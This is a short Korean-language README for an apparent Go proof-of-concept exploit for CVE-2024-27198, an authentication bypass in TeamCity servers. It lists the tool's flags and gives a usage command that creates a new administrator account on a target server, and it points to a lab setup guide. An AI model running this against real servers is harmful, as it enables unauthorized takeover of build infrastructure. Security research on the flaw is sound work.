
Go로 작성된 CVE-2024-27198용 PoC

NIST: https://nvd.nist.gov/vuln/detail/CVE-2024-27198
go run CVE-2024-27198.go -h
-s string
TeamCity Server
-p string
New admin password
-u string
New admin username
-proxy
Proxy URL (optional)
go run CVE-2024-27198.go -s http://IP_OR_FQDN:PORT -u new_admin_username -p new_admin_password -proxy http://IP_OR_FQDN:PORT
실습 환경 구축 지침은 https://github.com/yoryio/CVE-2024-27198 을 참조하십시오.